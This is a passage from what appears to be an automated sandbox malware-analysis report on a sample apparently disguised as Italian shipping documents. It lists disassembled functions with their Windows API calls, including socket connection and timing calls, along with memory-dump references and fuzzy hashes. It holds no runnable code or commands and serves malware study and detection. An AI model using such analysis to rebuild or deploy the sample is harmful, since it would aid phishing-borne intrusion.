                        • _wcslen.LIBCMT ref: 0044960D
                        • _wcslen.LIBCMT ref: 0044961A
                        • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$_wcslen$_wcspbrk
                        • String ID:
                        • API String ID: 1856069659-0
                        • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                        • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                        • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                        • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                        Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(?), ref: 004478E2
                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                        • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                        • GetCursorPos.USER32(00000000), ref: 0044796A
                        • TrackPopupMenuEx.USER32(02EE64C0,00000000,00000000,?,?,00000000), ref: 00447991
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CursorMenuPopupTrack$Proc
                        • String ID:
                        • API String ID: 1300944170-0
                        • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                        • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                        • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                        • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                        Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                        Download Yara Rule
                        APIs
                        • GetClientRect.USER32(?,?), ref: 004479CC
                        • GetCursorPos.USER32(?), ref: 004479D7
                        • ScreenToClient.USER32(?,?), ref: 004479F3
                        • WindowFromPoint.USER32(?,?), ref: 00447A34
                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Client$CursorFromPointProcRectScreenWindow
                        • String ID:
                        • API String ID: 1822080540-0
                        • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                        • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                        • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                        • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                        Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                        • EndPaint.USER32(?,?), ref: 00447D13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                        • String ID:
                        • API String ID: 659298297-0
                        • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                        • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                        • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                        • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                        Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                          • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                          • Part of subcall function 00440D98: SendMessageW.USER32(02EE1B88,000000F1,00000000,00000000), ref: 00440E6E
                          • Part of subcall function 00440D98: SendMessageW.USER32(02EE1B88,000000F1,00000001,00000000), ref: 00440E9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Window$EnableMessageSend$LongShow
                        • String ID:
                        • API String ID: 142311417-0
                        • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                        • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                        • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                        • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                        Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                        • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                        • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                        • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                        Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                        Download Yara Rule
                        APIs
                        • IsWindowVisible.USER32(?), ref: 00445879
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                        • _wcslen.LIBCMT ref: 004458FB
                        • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                        • String ID:
                        • API String ID: 3087257052-0
                        • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                        • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                        • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                        • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                        Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                        • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                        • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                        • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                        • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                        • String ID:
                        • API String ID: 245547762-0
                        • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                        • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                        • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                        • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                        Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 004471D8
                        • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                        • SelectObject.GDI32(?,00000000), ref: 00447228
                        • BeginPath.GDI32(?), ref: 0044723D
                        • SelectObject.GDI32(?,00000000), ref: 00447266
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Object$Select$BeginCreateDeletePath
                        • String ID:
                        • API String ID: 2338827641-0
                        • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                        • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                        • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                        • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                        Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 00434598
                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                        • Sleep.KERNEL32(00000000), ref: 004345D4
                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CounterPerformanceQuerySleep
                        • String ID:
                        • API String ID: 2875609808-0
                        • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                        • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                        • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                        • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                        Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                        • MessageBeep.USER32(00000000), ref: 00460C46
                        • KillTimer.USER32(?,0000040A), ref: 00460C68
                        • EndDialog.USER32(?,00000001), ref: 00460C83
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                        • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                        • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                        • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                        Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Destroy$DeleteObjectWindow$Icon
                        • String ID:
                        • API String ID: 4023252218-0
                        • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                        • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                        • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                        • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                        Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                        • DeleteObject.GDI32(?), ref: 00455736
                        • DeleteObject.GDI32(?), ref: 00455744
                        • DestroyIcon.USER32(?), ref: 00455752
                        • DestroyWindow.USER32(?), ref: 00455760
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                        • String ID:
                        • API String ID: 1489400265-0
                        • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                        • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                        • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                        • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                        Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                        • DestroyWindow.USER32(?), ref: 00455728
                        • DeleteObject.GDI32(?), ref: 00455736
                        • DeleteObject.GDI32(?), ref: 00455744
                        • DestroyIcon.USER32(?), ref: 00455752
                        • DestroyWindow.USER32(?), ref: 00455760
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                        • String ID:
                        • API String ID: 1042038666-0
                        • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                        • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                        • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                        • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                        Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
                        • API String ID: 2625713937-0
                        • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                        • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                        • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                        • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                        Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 0041780F
                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
